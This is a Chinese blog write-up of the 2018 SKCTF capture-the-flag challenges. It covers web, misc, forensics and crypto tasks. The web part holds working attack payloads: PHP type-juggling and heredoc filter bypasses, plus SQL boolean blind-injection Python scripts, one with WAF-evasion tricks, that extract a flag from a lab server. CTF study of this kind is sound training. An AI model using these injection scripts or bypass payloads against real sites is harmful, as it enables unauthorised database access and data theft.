<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="2018-3rd-SKCTF"><meta name="keywords" content=""><meta name="author" content="V0WKeep3r,v0wldl@163.com"><meta name="copyright" content="V0WKeep3r"><title>2018-3rd-SKCTF | V0W's Blog</title><link rel="shortcut icon" href="/favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.8.2"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.8.2"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.2.0'
} </script><meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="V0W's Blog" type="application/atom+xml">
</head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Web"><span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#wait-a-minute"><span class="toc-text">wait a minute</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%AB%E5%A4%A7%E5%85%B3"><span class="toc-text">八大关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#php-string"><span class="toc-text">php string</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#easy-web"><span class="toc-text">easy web</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#login-me"><span class="toc-text">login me</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%95%E5%95%8A%E7%BB%95"><span class="toc-text">绕啊绕</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Msic"><span class="toc-text">Msic</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%89%BE%E5%88%B0%E4%B9%9F%E6%89%93%E4%B8%8D%E5%BC%80"><span class="toc-text">找到也打不开</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Just-Listen"><span class="toc-text">Just Listen</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9C%9F%E9%A6%99"><span class="toc-text">真香</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%96%E8%AF%81"><span class="toc-text">取证</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Game"><span class="toc-text">Game</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Crypto"><span class="toc-text">Crypto</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%BF%E5%B0%84%E5%8A%A0%E5%AF%86"><span class="toc-text">仿射加密</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9C%8B%E5%88%B0%E7%9A%84%E5%B0%B1%E6%98%AF%E5%85%A8%E9%83%A8%E4%BA%86"><span class="toc-text">看到的就是全部了</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Play-Fair"><span class="toc-text">Play Fair</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ez-rsa"><span class="toc-text">ez_rsa</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B5%81%E5%AF%86%E7%A0%81"><span class="toc-text">流密码</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/Kaneki.jpg"></div><div class="author-info__name text-center">V0WKeep3r</div><div class="author-info__description text-center">Stay Hungry, Stay Foolish.</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/qingchenldl">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">58</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">31</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">11</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">友链</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://zhuxianjin.github.io/">J0k3r</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://p0desta.com/">p0desta</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://daolgts.github.io/">dlgts</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://iwenhu.cn/">mengchen</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://p0sec.net/">p0</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://asa9ao.xyz/">唯湖</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://seaii-blog.com/">seaii</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://wzt.ac.cn/">WCatalpa.T</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://syf.ac.cn/">7N1ght</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://www.nicefish.top/posts/">nicefish</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://flag0.com/">GetFlag</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/img/index.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">V0W's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">主页</a><a class="site-page" href="/archives">文章</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/categories">分类</a><a class="site-page" href="/about">关于我</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">2018-3rd-SKCTF</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2018-05-12</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/CTF/">CTF</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">3k</span><span class="post-meta__separator">|</span><span>阅读时长: 12 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="wait-a-minute"><a href="#wait-a-minute" class="headerlink" title="wait a minute"></a>wait a minute</h2><p>源码：</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">&#x27;password&#x27;</span>]))</span><br><span class="line">&#123;</span><br><span class="line">	<span class="keyword">if</span>(strcmp($_POST[<span class="string">&#x27;password&#x27;</span>],$password)==<span class="number">0</span>)&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&quot;&lt;h1&gt;Welcome,you need to wait......&lt;br&gt;The flag will become soon....&lt;/h1&gt;&lt;br&gt;&quot;</span>;</span><br><span class="line">		<span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">&#x27;time&#x27;</span>]))&#123;</span><br><span class="line">				$t=$_GET[<span class="string">&#x27;time&#x27;</span>];</span><br><span class="line">		        <span class="keyword">if</span>(!is_numeric($t))&#123;</span><br><span class="line">		                <span class="keyword">echo</span> <span class="string">&#x27;Sorry.&lt;br&gt;&#x27;</span>;</span><br><span class="line">		        &#125;<span class="keyword">else</span> <span class="keyword">if</span>($t &lt; <span class="number">66</span> * <span class="number">55</span> * <span class="number">44</span> * <span class="number">33</span> * <span class="number">22</span> * <span class="number">11</span> )&#123;</span><br><span class="line">		                        <span class="keyword">echo</span> <span class="string">&#x27;you need a bigger time.&lt;br&gt;&#x27;</span>;</span><br><span class="line">		        &#125;<span class="keyword">else</span> <span class="keyword">if</span>($t &gt; <span class="number">11</span> * <span class="number">23</span> * <span class="number">33</span> * <span class="number">44</span> * <span class="number">55</span> * <span class="number">66</span>)&#123;</span><br><span class="line">		                        <span class="keyword">echo</span> <span class="string">&#x27;you need a smaller time.&lt;br&gt;&#x27;</span>;</span><br><span class="line">		        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">		                sleep((<span class="keyword">int</span>)$t);</span><br><span class="line">		                var_dump($flag);</span><br><span class="line">		        &#125;</span><br><span class="line">		                <span class="keyword">echo</span> <span class="string">&#x27;&lt;hr&gt;&#x27;</span>;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&quot;Password is wrong............&lt;br&gt;&quot;</span>;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&quot;&lt;h1&gt;Please input password..........&lt;/h1&gt;&lt;br&gt;&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>逻辑很简单，password可以通过构造数组绕过。<br>time比较麻烦，首先<code>time=11*22*33*44*55*66</code>，但是由于sleep(time)，这么大的time，要等待很久，大概算一下是几百天吧，这里由于用到强制转换<code>(int)$t</code>。<br>而16进制0x开头在强制转换中出现问题，导致转换成0.</p>
<p>所以payload为：<code>?time=0x4c06f350</code>.</p>
<h2 id="八大关"><a href="#八大关" class="headerlink" title="八大关"></a>八大关</h2><p>这道，一关又一关，但其实还是都比较简单的。<br>1.XFF<br>2.UA<br>3.php弱类型md5<br>4.strcmp<br>5.md5爆破，附上脚本：</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getmd5</span>(<span class="params">code</span>):</span></span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">999999</span>):</span><br><span class="line">		temp = hashlib.md5(str(i)).hexdigest()</span><br><span class="line">		<span class="keyword">if</span> temp[<span class="number">0</span>:<span class="number">6</span>] == code:</span><br><span class="line">			<span class="keyword">return</span> i</span><br><span class="line"><span class="keyword">print</span> getmd5(<span class="string">&#x27;084a12&#x27;</span>)</span><br></pre></td></tr></table></figure>
<p>6.php弱类型，数组绕过(md5(arr)==null)<br>7.urldecode，在传递url时，会进行一次，所以要两次urlencode（’SKCTF’）<br>8.js,看源码就知道了密码了。</p>
<h2 id="php-string"><a href="#php-string" class="headerlink" title="php string"></a>php string</h2><p>首先、我有一个误区：看到图片名称heredoc我以为会是一个冒充web的隐写题，图片里有个doc这样的==、<br>提示说文件泄露，得到index.php.swp<br>Linux 还原：</p>
<pre><code>vim -r index.php.swp</code></pre>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180512/DFih50Lkh3.png?imageslim" alt="mark"><br>逻辑很简单，只要id=’6666’,即可。(这道题，当时我真的眼瞎==、只看到了6666，自动忽略了两个<code>&#39;</code>)<br>但是问题在于：直接传进去的id是有过滤的，过滤了<code>&#39;</code>，所以没有办法直接让id=’6666’，这是才是佩奇的提示==、heredoc！</p>
<blockquote>
<p>heredoc是一种perl风格的定界符。用于定界和传递字符串。用 heredoc 句法结构：&lt;&lt;&lt;。在该运算符之后要提供一个标识符，然后换行。接下来是字符串 string 本身，最后要用前面定义的标识符作为结束标志。 </p>
</blockquote>
<p><a target="_blank" rel="noopener" href="http://php.net/manual/zh/language.types.string.php#language.types.string.syntax.heredoc">php手册中heredoc的相关介绍</a></p>
<p>于是我们知道了：可以利用heredoc来绕过<code>&#39;</code>的过滤。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&lt;&lt;&lt;xx</span><br><span class="line">6666</span><br><span class="line">xx;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>但是注意的是每一行都需要一个换行符,url里用%0a,<br>payload:<code>?id=&lt;&lt;&lt;xx%0A6666%0Axx;%0A</code></p>
<h2 id="easy-web"><a href="#easy-web" class="headerlink" title="easy web"></a>easy web</h2><p>有源码泄露，得到源码<code>/www.zip</code>,<br>里面有三个php文件：<br>index.php</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">ini_set(<span class="string">&#x27;session.serialize_handler&#x27;</span>, <span class="string">&#x27;php_serialize&#x27;</span>);</span><br><span class="line">session_start();</span><br><span class="line"><span class="keyword">echo</span> rand();</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">&#x27;up_addr&#x27;</span>]))</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">include</span>(<span class="string">&quot;rand_addr.php&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span>($_POST[<span class="string">&#x27;up_addr&#x27;</span>]===$up_addr&amp;&amp;<span class="keyword">isset</span>($_POST[<span class="string">&#x27;str&#x27;</span>]))</span><br><span class="line">    &#123;</span><br><span class="line">        $str = $_POST[<span class="string">&#x27;str&#x27;</span>];</span><br><span class="line">        $_SESSION[<span class="string">&#x27;name&#x27;</span>] = $str;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>kkk.php</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">ini_set(&#39;session.serialize_handler&#39;, &#39;php&#39;);</span><br><span class="line">session_start();</span><br><span class="line">class  SKCTF&#123;</span><br><span class="line">    var $content;</span><br><span class="line">    function __destruct() &#123;</span><br><span class="line">        include(&quot;rand_addr.php&quot;);</span><br><span class="line">        var_dump($this-&gt;content);</span><br><span class="line">        file_put_contents(&quot;&#x2F;var&#x2F;www&#x2F;html&#x2F;upload&#x2F;$up_addr.php&quot;,$this-&gt;content);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$a &#x3D; new SKCTF();</span><br><span class="line">echo $a;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>rand_addr.php</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$up_addr &#x3D; str_shuffle(&#39;0123456789abcdefghijklmnopqrstuvwxyz&#39;);</span><br></pre></td></tr></table></figure>

<p>这道题是考的是session的反序列化。有点难，先放一放==、</p>
<h2 id="login-me"><a href="#login-me" class="headerlink" title="login me"></a>login me</h2><blockquote>
<p>听说只有admin才能拿到flag。</p>
</blockquote>
<p>本题考查sql bool盲注。一开始把问题想简单了，以为只是admin的万能密码之类的==、<br>先做一下无过滤的版本：<br>payload:</p>
<pre><code>username=1&#39; or substr(&#39;a&#39;,1,1)=&#39;a&#39;#&amp;password=123</code></pre>
<p>下面就开始盲注，这里盲注成功的条件是返回弹窗<code>Wrong password</code>,失败返回<code>Wrong username</code> </p>
<p>源码给出提示，直接访问web4.sql得到表的结构：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line"># Host: localhost  (Version: 5.5.53-log)</span><br><span class="line"># Date: 2018-05-04 17:13:56</span><br><span class="line"># Generator: MySQL-Front 5.3  (Build 4.234)</span><br><span class="line"></span><br><span class="line">&#x2F;*!40101 SET NAMES utf8 *&#x2F;;</span><br><span class="line"></span><br><span class="line">#</span><br><span class="line"># Structure for table &quot;admin&quot;</span><br><span class="line">#</span><br><span class="line"></span><br><span class="line">DROP TABLE IF EXISTS &#96;admin&#96;;</span><br><span class="line">CREATE TABLE &#96;admin&#96; (</span><br><span class="line">  &#96;id&#96; int(11) DEFAULT NULL,</span><br><span class="line">  &#96;username&#96; char(20) DEFAULT NULL,</span><br><span class="line">  &#96;password&#96; char(40) DEFAULT NULL</span><br><span class="line">) ENGINE&#x3D;MyISAM DEFAULT CHARSET&#x3D;utf8;</span><br><span class="line"></span><br><span class="line">#</span><br><span class="line"># Structure for table &quot;f1ag&quot;</span><br><span class="line">#</span><br><span class="line"></span><br><span class="line">DROP TABLE IF EXISTS &#96;f1ag&#96;;</span><br><span class="line">CREATE TABLE &#96;f1ag&#96; (</span><br><span class="line">  &#96;f14g&#96; char(40) DEFAULT NULL</span><br><span class="line">) ENGINE&#x3D;MyISAM DEFAULT CHARSET&#x3D;utf8;</span><br></pre></td></tr></table></figure>
<p>得到表的结构为：</p>
<ul>
<li>admin<ul>
<li>id</li>
<li>username</li>
<li>password</li>
</ul>
</li>
<li>f1ag<ul>
<li>f14g</li>
</ul>
</li>
</ul>
<p>脚本如下：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line"># -*-coding:utf-8-*-</span><br><span class="line"></span><br><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">url &#x3D; &#39;http:&#x2F;&#x2F;192.168.211.131:49157&#x2F;&#39;</span><br><span class="line"></span><br><span class="line">def check(payload):</span><br><span class="line">	postdata&#x3D;&#123;&#39;username&#39;:payload,&#39;password&#39;:&#39;admin&#39;&#125;</span><br><span class="line">	r &#x3D; requests.post(url,postdata).content</span><br><span class="line">	#print r;</span><br><span class="line">	return &#39;Wrong password&#39; in r</span><br><span class="line"></span><br><span class="line">flag &#x3D; &#39;&#39;</span><br><span class="line">s &#x3D; r&#39;1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@_&#123;&#125;&#39;</span><br><span class="line">for i in xrange(1,64):</span><br><span class="line">	for c in s:</span><br><span class="line">		payload &#x3D;&#39;1\&#39;or substr((select f14g from f1ag),%s,1) &#x3D; \&#39;%s\&#39;#&#39;%(str(i),c)</span><br><span class="line">		#print payload</span><br><span class="line">		if check(payload):</span><br><span class="line">			flag +&#x3D; c</span><br><span class="line">			break</span><br><span class="line">	print flag</span><br><span class="line">	if &#39;&#125;&#39; in flag:</span><br><span class="line">		break</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180512/37Egjm9m2e.png?imageslim" alt="mark"></p>
<p>接下来是加上waf,过滤以后的==、</p>
<p>首先测试过滤。过滤采用burp进行fuzz。结果如下：<br><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180512/IgECkdADIl.png?imageslim" alt="mark"></p>
<p>过滤<code>union</code>,<code>if</code>,<code>=</code>,<code>and</code>,<code>&lt;</code>,<code>&gt;</code>,<code>or</code>,<code>substr</code>,<code>mid</code>,<code>like</code>,空格</p>
<p>可以用<code>/**/</code>绕过空格，<code>in</code>绕过<code>=</code>,<code>lpad</code>函数代替<code>substr</code>用于截取字符串。</p>
<p>payload：<code>username=1&#39;/**/||lpad((&#39;a&#39;),1,1)/**/in/**/(&#39;a&#39;)#&amp;password=123</code></p>
<p>脚本如下：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line"># -*-coding:utf-8-*-</span><br><span class="line"></span><br><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">url &#x3D; &#39;http:&#x2F;&#x2F;192.168.211.131:49154&#x2F;&#39;</span><br><span class="line"></span><br><span class="line">def check(payload):</span><br><span class="line">	postdata&#x3D;&#123;&#39;username&#39;:payload,&#39;password&#39;:&#39;123&#39;&#125;</span><br><span class="line">	r &#x3D; requests.post(url,postdata).content</span><br><span class="line">	#print r;</span><br><span class="line">	return &#39;Wrong password&#39; in r</span><br><span class="line"></span><br><span class="line">flag &#x3D; &#39;&#39;</span><br><span class="line">s &#x3D; r&#39;1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@_&#123;&#125;&#39;</span><br><span class="line">for i in xrange(1,64):</span><br><span class="line">	for c in s:</span><br><span class="line">		#payload &#x3D;&#39;1\&#39;or substr((select f14g from f1ag),%s,1) &#x3D; \&#39;%s\&#39;#&#39;%(str(i),c)</span><br><span class="line">		payload &#x3D; &#39;1\&#39;&#x2F;**&#x2F;||&#x2F;**&#x2F;lpad((select&#x2F;**&#x2F;f14g&#x2F;**&#x2F;from&#x2F;**&#x2F;f1ag),%s,1)&#x2F;**&#x2F;in&#x2F;**&#x2F;(\&#39;%s\&#39;)#&#39;%(str(i),flag+c)</span><br><span class="line">		#print payload</span><br><span class="line">		if check(payload):</span><br><span class="line">			flag +&#x3D; c</span><br><span class="line">			break</span><br><span class="line">	print flag</span><br><span class="line">	if &#39;&#125;&#39; in flag:</span><br><span class="line">		break</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180513/f8BhJIKjAd.png?imageslim" alt="mark"></p>
<h2 id="绕啊绕"><a href="#绕啊绕" class="headerlink" title="绕啊绕"></a>绕啊绕</h2><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">$rule &#x3D; &#39;&#x2F;([[:punct:]]+|[[:alpha:]]+|[[:digit:]]+)&#x2F;&#39;;</span><br><span class="line">        if (8 &gt; preg_match_all($rule, $data, $arr))</span><br><span class="line">        &#123;</span><br><span class="line">            echo preg_match_all($rule, $data, $arr);</span><br><span class="line">            break;</span><br><span class="line">        &#125; </span><br><span class="line">        $num &#x3D; 0;</span><br><span class="line">        $nn &#x3D; array(&#39;punct&#39;, &#39;alpha&#39;, &#39;digit&#39;);</span><br><span class="line">        foreach ($nn as $ns)</span><br><span class="line">        &#123; </span><br><span class="line">            if (preg_match(&quot;&#x2F;[[:$ns:]]+&#x2F;&quot;, $data))</span><br><span class="line">            &#123;</span><br><span class="line">                $num +&#x3D; 1;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        if ($num &lt; 3)</span><br><span class="line">            break;</span><br><span class="line">        if (187667123 &#x3D;&#x3D; $data)</span><br><span class="line">        &#123;</span><br><span class="line">            $da &#x3D; $_GET[&#39;num&#39;];</span><br><span class="line">            if (!is_numeric($da))</span><br><span class="line">            &#123;</span><br><span class="line">                if(27500 &lt; $da)</span><br><span class="line">                &#123;</span><br><span class="line">                    echo $flag;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            else</span><br><span class="line">            &#123;</span><br><span class="line">                echo &quot;Forbidden!!&quot;;</span><br><span class="line">            &#125;</span><br><span class="line">            </span><br><span class="line">        &#125; </span><br><span class="line">        else</span><br><span class="line">            echo &#39;Wrong password&#39;;</span><br><span class="line">            exit;</span><br></pre></td></tr></table></figure>

<p>php正则表达式的内置通用字符簇，<code>[[:punct:]]</code>代表任意标点符号，<code>[[:alpha:]]</code>代表任意字母，<code>[[:digit:]]</code>代表任意数字。</p>
<p><code>if (8 &gt; preg_match_all($rule, $data, $arr))</code><br>arr在data中要匹配rule条件8次以上，<strong>注意是匹配八次以上，不是八个以上的数字字母符号</strong></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">$nn &#x3D; array(&#39;punct&#39;, &#39;alpha&#39;, &#39;digit&#39;);</span><br><span class="line">foreach ($nn as $ns)</span><br><span class="line">&#123;</span><br><span class="line">	if (preg_match(&quot;&#x2F;[[:$ns:]]+&#x2F;&quot;, $data))&#123;</span><br><span class="line">		$num +&#x3D; 1;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">if ($num &lt; 3)</span><br><span class="line">break;</span><br></pre></td></tr></table></figure>
<p>这里foreach循环，就是要求的是data里面既要有数字，又要有字母，标点。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">if (187667123 &#x3D;&#x3D; $data)</span><br><span class="line">&#123;</span><br></pre></td></tr></table></figure>
<p>这里要求<code>data==187667123</code>。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">$da &#x3D; $_GET[&#39;num&#39;];</span><br><span class="line">if (!is_numeric($da))</span><br><span class="line">&#123;</span><br><span class="line">	if(27500 &lt; $da)</span><br><span class="line">	&#123;</span><br><span class="line">	echo $flag;</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>
<p>这里要求GET一个num，不是数字，而且要比25700大，可以通过弱类型绕过，比如传入<code>27599abc</code>等<br>得到payload：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">?num&#x3D;27599abc</span><br><span class="line">POST: data&#x3D;187667123.0e+0-0+2-2+3-3</span><br></pre></td></tr></table></figure>
<h1 id="Msic"><a href="#Msic" class="headerlink" title="Msic"></a>Msic</h1><h2 id="找到也打不开"><a href="#找到也打不开" class="headerlink" title="找到也打不开"></a>找到也打不开</h2><p>从数据包中提取文件，wireshark导出http对象，得到压缩包。查看16进制后得知为伪加密，7z打开，或者修改一位即解。</p>
<h2 id="Just-Listen"><a href="#Just-Listen" class="headerlink" title="Just Listen"></a>Just Listen</h2><p>有个password的图片，换通道可以看到密码：<br><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180513/5a5cgkH65H.png?imageslim" alt="mark"><br>但是要注意一下：密码是forensics_is_fun不带key。</p>
<p>有了密码和mp3文件，想到应该是mp3加密。利用工具MP3_Stego来解，有了密码可以得到隐藏文件，一个txt。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">http:&#x2F;&#x2F;www.petitcolas.net&#x2F;steganography&#x2F;mp3stego&#x2F;</span><br></pre></td></tr></table></figure>

<h2 id="真香"><a href="#真香" class="headerlink" title="真香"></a>真香</h2><p>一看这个gif，很大。怀疑是有zip，可以通过winhex提取出zip。<br>但是zip不是直接能打开的，有密码，真加密（不是伪加密==、）当时没想到原来文件尾的blind_water_mark就是密码。<br>解压后，得到两张图，一张叫or，一张叫xor。</p>
<p>看提示，极有可能是盲水印攻击。</p>
<p>利用github上的盲水印攻击工具。<br><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180513/fJEE0Adj51.png?imageslim" alt="mark"></p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180513/6GL7Efhj7l.png?imageslim" alt="mark"></p>
<h2 id="取证"><a href="#取证" class="headerlink" title="取证"></a>取证</h2><p>首先下载下来是个虚拟镜像，于是连接，得到一个压缩包，解压是一个gif（需要用WinRAR解压，因为很多压缩软件不支持NTFS）,但是图片大小和所占空间相差很大，有猫腻！</p>
<p>提示是NTFS。</p>
<blockquote>
<p>NTFS交换数据流（alternate data streams，简称ADS）是NTFS磁盘格式的一个特性，在NTFS文件系统下每一个文件，都有着主文件流和非主文件流，主文件流能够直接看到；而非主文件流寄宿于主文件流中，无法直接读取，这个非主文件流就是NTFS交换数据流。交换数据流的诞生源于Windows系统与苹果的HFS系统的交互需求，NTFS使用交换数据流来存储文件相关元数据等等。</p>
</blockquote>
<blockquote>
<p>ADS的作用在于，它允许一个文件携带着附加的信息。例如，IE浏览器下载文件时，会向文件添加一个数据流，标记该文件来源于外部，即带有风险，那么，在用户打开文件时，就会弹出文件警告提示。再如，在网址收藏中，也会附加一个favicon数据流以存放网站图标。</p>
</blockquote>
<p>可以利用工具lads和ntfsstreamseditor来导出数据。<br><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180513/K6bEgaD8HC.png?imageslim" alt="mark"></p>
<p>又是一个gif，保存所有帧得到flag。</p>
<h2 id="Game"><a href="#Game" class="headerlink" title="Game"></a>Game</h2><p>解法一、玩游戏，但是我手残==、</p>
<p>解法二、反编译，下载GameMarker 8.0 Decompiler，将exe进行反编译。得到工程文件gmk，下载Gamemaker可以读取所有游戏文件资源，找到flag。<code>==、我怎么不知道</code></p>
<p>解法三、最人性化的解法就是修改save文件。因为玩过游戏会产生save文件，只要明白save文件的格式，修改文件即可，偏移量+12.<br>0112-&gt;011E<br><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180513/01Ih686Ijh.png?imageslim" alt="mark"></p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/blog/180513/B98ialEhHA.png?imageslim" alt="mark"></p>
<h1 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h1><h2 id="仿射加密"><a href="#仿射加密" class="headerlink" title="仿射加密"></a>仿射加密</h2><p>仿射加密，python爆就行。</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">letter = <span class="string">&#x27;abcdefghijklmnopqrstuvwxyz&#x27;</span>  </span><br><span class="line">word = <span class="string">&#x27;fwpcpywpcphnxaoxlywpcphnxlhco&#x27;</span>  </span><br><span class="line">flag = <span class="string">&#x27;&#x27;</span>  </span><br><span class="line">      </span><br><span class="line">a = <span class="number">11</span>  </span><br><span class="line">b = <span class="number">23</span>  </span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> word:  </span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">0</span>,len(letter)):  </span><br><span class="line">        <span class="keyword">if</span> i == letter[(a*j+b)%<span class="number">26</span>]:  </span><br><span class="line">            flag+=letter[j]  </span><br><span class="line"><span class="keyword">print</span> flag  </span><br><span class="line"></span><br></pre></td></tr></table></figure>

